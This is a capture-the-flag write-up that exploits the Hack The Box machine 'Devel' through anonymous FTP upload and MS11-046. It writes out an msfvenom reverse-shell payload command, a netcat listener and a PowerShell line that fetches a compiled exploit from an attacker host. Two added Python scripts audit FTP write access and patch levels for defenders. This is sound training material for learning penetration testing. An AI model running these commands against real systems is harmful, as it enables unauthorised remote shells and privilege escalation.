Devel - Hack The Box (HTB) writeup w/o Metasploit

Hack The Box is an online platform that helps in learning penetration testing.

Devel is a retired box with difficulty level Easy.

Start with an nmap scan:

#nmap -sC -sV 10.10.10.5
  • -sC runs the default scripts against the target
  • -sV enumerates service versions

Two ports are open: 21 (ftp) and 80 (http).

Use nmap to scan all ports (0-65535)

#nmap -p- 10.10.10.5 | tee nmap-all-ports.txt
  • -p- scans all ports
  • tee saves the output to a file while still printing it to standard output

nmap UDP scan:

#nmap -sU 10.10.10.5 | tee nmap-udp.txt

No open ports were found in the UDP scan.

Check the webpage, as port 80 is open.

Anonymous login is allowed on ftp. Try to upload test.html.

test.html uploads successfully. This suggests uploading a payload the same way to get a reverse shell.
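The finding that makes this box work is an FTP service that accepts anonymous logins and lets that user write files. Below is an added example, not part of the original writeup, of how a defender can audit a server for exactly that misconfiguration: log in anonymously with Python's ftplib, attempt to store a small marker file, and remove it again. The `FakeFtp` class, the marker file name and the sample servers are constructed so the script runs offline; `audit_host()` runs the same probe against a real server.

```python
import io
import ftplib
from dataclasses import dataclass

# Constructed marker file name used for the write probe; not from the writeup.
MARKER_NAME = "ftp-audit-marker.txt"


@dataclass
class FtpAuditResult:
    anonymous_login: bool   # server accepted the anonymous user
    anonymous_write: bool   # anonymous user could STOR a file
    detail: str


def audit_anonymous_ftp(ftp) -> FtpAuditResult:
    """Probe an already-connected ftplib.FTP-compatible object.

    Tries an anonymous login, then an upload of a small marker file, and
    removes the marker again so the audit leaves nothing behind.
    """
    try:
        ftp.login()  # ftplib defaults to user 'anonymous'
    except ftplib.error_perm as exc:
        return FtpAuditResult(False, False, f"anonymous login refused: {exc}")
    try:
        ftp.storbinary(f"STOR {MARKER_NAME}", io.BytesIO(b"audit marker\n"))
    except ftplib.error_perm as exc:
        return FtpAuditResult(True, False, f"anonymous login allowed, upload refused: {exc}")
    try:
        ftp.delete(MARKER_NAME)
        cleanup = "marker removed"
    except ftplib.error_perm:
        cleanup = f"could not remove {MARKER_NAME}, delete it by hand"
    return FtpAuditResult(True, True, f"anonymous upload succeeded ({cleanup})")


def audit_host(host: str, port: int = 21, timeout: float = 10.0) -> FtpAuditResult:
    """Connect to a real server and run the probe (network access required)."""
    with ftplib.FTP() as ftp:
        ftp.connect(host, port, timeout=timeout)
        return audit_anonymous_ftp(ftp)


class FakeFtp:
    """Constructed stand-in for ftplib.FTP so the audit can be exercised offline."""

    def __init__(self, allow_login: bool, allow_write: bool):
        self.allow_login = allow_login
        self.allow_write = allow_write
        self.files = []  # names currently stored on the fake server

    def login(self, user="", passwd="", acct=""):
        if not self.allow_login:
            raise ftplib.error_perm("530 Login incorrect.")
        return "230 Login successful."

    def storbinary(self, cmd, fp, blocksize=8192, callback=None, rest=None):
        if not self.allow_write:
            raise ftplib.error_perm("550 Permission denied.")
        self.files.append(cmd.split(None, 1)[1])
        return "226 Transfer complete."

    def delete(self, filename):
        self.files.remove(filename)
        return "250 Delete operation successful."


if __name__ == "__main__":
    for label, server in (("locked down", FakeFtp(False, False)),
                          ("read-only anonymous", FakeFtp(True, False)),
                          ("writable anonymous", FakeFtp(True, True))):
        print(f"{label}: {audit_anonymous_ftp(server)}")
```

A writable anonymous FTP root that is also the IIS web root is the condition to alert on; the audit is worth running on a schedule so that a configuration change is caught before someone else finds it.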

msfvenom is the tool used to create the reverse shell payload.

List all supported output formats:

#msfvenom -l formats

List all Windows payloads:

#msfvenom --list payloads | grep windows

Create the payload with msfvenom:

#msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.10.21 LPORT=1111 -o shell.aspx

Upload the payload to the server, as anonymous login is allowed on ftp:

#put shell.aspx

Start a listener to catch the reverse shell:

#nc -lvnp 1111

Browsing to the uploaded page gives a shell.

Trying to access the Administrator and babis folders gives access denied.

Privilege Escalation

#systeminfo

The operating system is Windows 7 Enterprise with no hotfixes installed, which suggests an existing exploit will work. A Google search turned up MS11-046 (EDB-ID 40564, CVE-2011-1249).
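The `systeminfo` output is the clue here: a Windows 7 host reporting no hotfixes at all. Below is an added example, not from the original writeup, of a small parser for that output that a defender can run across collected `systeminfo` dumps to flag hosts in the same state. The two sample dumps are constructed and abridged (the KB numbers are placeholders, not real hotfixes); `Hotfix(s): N/A` is what `systeminfo` prints when nothing is installed.

```python
import re
from typing import Dict, List

# Constructed, abridged samples of `systeminfo` output; not captured from the box.
UNPATCHED_HOST = """\
Host Name:                 EXAMPLE-PC
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
System Type:               X86-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Example Network Adapter
"""

PATCHED_HOST = """\
Host Name:                 EXAMPLE-PC2
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB0000001
                           [02]: KB0000002
                           [03]: KB0000003
"""

# A top-level field starts at column 0: "Name:   value". Continuation lines are indented.
FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z ()/]*?):\s+(.*)$")
KB_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")


def parse_systeminfo(text: str) -> Dict[str, object]:
    """Return the top-level fields plus a 'hotfixes' list of KB identifiers."""
    fields: Dict[str, object] = {}
    hotfixes: List[str] = []
    in_hotfix_block = False
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            key, value = m.group(1).strip(), m.group(2).strip()
            fields[key] = value
            in_hotfix_block = key == "Hotfix(s)"
            continue
        # Indented continuation lines belong to the field above them.
        if in_hotfix_block:
            kb = KB_RE.search(line)
            if kb:
                hotfixes.append(kb.group(1))
    fields["hotfixes"] = hotfixes
    return fields


def assess_patch_level(info: Dict[str, object]) -> List[str]:
    """Flag conditions that make a host an easy privilege-escalation target."""
    findings: List[str] = []
    if not info["hotfixes"]:
        findings.append("no hotfixes installed")
    os_name = str(info.get("OS Name", ""))
    os_version = str(info.get("OS Version", ""))
    if "Windows 7" in os_name and "Service Pack 1" not in os_version:
        findings.append("Windows 7 without Service Pack 1")
    return findings


if __name__ == "__main__":
    for label, dump in (("unpatched", UNPATCHED_HOST), ("patched", PATCHED_HOST)):
        info = parse_systeminfo(dump)
        print(f"{label}: {info['OS Name']} / {info['OS Version']}")
        print(f"  hotfixes: {info['hotfixes'] or 'none'}")
        print(f"  findings: {assess_patch_level(info) or 'none'}")
```

Feed it real dumps with `parse_systeminfo(open(path).read())`; any host that returns findings is one where a public kernel exploit of this vintage is likely to work, and patching it is the fix.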

#searchsploit -m 40564

Refer to the notes in the exploit source to see how to compile it.

Compile with the command below:

#i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32

Upload it to the machine:

#powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.21:2222/MS11-046.exe', 'C:\Users\Public\Downloads\MS11-046.exe')"

Run the privilege escalation exploit:

#MS11-046.exe

Get root


If you have any questions, feel free to ask in the comments section below. Nothing gives me greater joy than helping my readers!

Disclaimer: This tutorial is for educational purposes only. The individual is solely responsible for any illegal act.
